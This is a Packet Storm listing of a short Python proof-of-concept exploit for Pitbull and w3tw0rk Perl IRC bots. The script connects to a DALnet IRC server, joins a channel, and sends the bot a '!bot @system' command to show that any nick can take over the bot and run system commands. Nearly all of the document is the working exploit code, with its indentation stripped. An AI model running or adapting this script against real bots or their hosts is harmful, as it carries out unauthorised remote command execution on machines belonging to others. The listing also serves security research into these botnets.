Proof of concept exploit for the Pitbull and w3tw0rk IRC bots that takes over the owner of a bot which then allows for remote code execution.
25d37202a1a216b2b3b0ea44f8cc962fb754a7bbee64d6160acc06a8185d216a# thehunter.py
# Pitbull / w3tw0rk Perl IRC Bot Remote Code Execution
# author: @shipcod3
# description: pitbull-w3tw0rk_hunter is POC exploit for Pitbull or w3tw0rk IRC Bot that takes over the owner of a bot which then allows Remote Code Execution.
import socket
import sys
def usage():
print("USAGE: python thehunter.py nick \n")
def main(argv):
if len(argv) < 2:
return usage()
#irc server connection settings
botnick = sys.argv[1] #admin payload for taking over the w3wt0rk bot
server = "us.dal.net" #irc server
channel = "#buhaypirata" #channel where the bot is located
irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #defines the socket
print "connecting to:"+server
irc.connect((server, 6667)) #connects to the server
irc.send("USER "+ botnick +" "+ botnick +" "+ botnick +" :I eat w3tw0rk bots!\n") #user authentication
irc.send("NICK "+ botnick +"\n") #sets nick
irc.send("JOIN "+ channel +"\n") #join the chan
irc.send("PRIVMSG "+channel+" :!bot @system 'uname -a' \n") #send the payload to the bot
while 1: #puts it in a loop
text=irc.recv(2040) #receive the text
print text #print text to console
if text.find('PING') != -1: #check if 'PING' is found
irc.send('PONG ' + text.split() [1] + '\r\n') #returnes 'PONG' back to the server (prevents pinging out!)
if text.find('!quit') != -1: #quit the Bot
irc.send ("QUIT\r\n")
sys.exit()
if text.find('Linux') != -1:
irc.send("PRIVMSG "+channel+" :The bot answers to "+botnick+" which allows command execution \r\n")
irc.send ("QUIT\r\n")
sys.exit()
if __name__ == "__main__":
main(sys.argv)
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed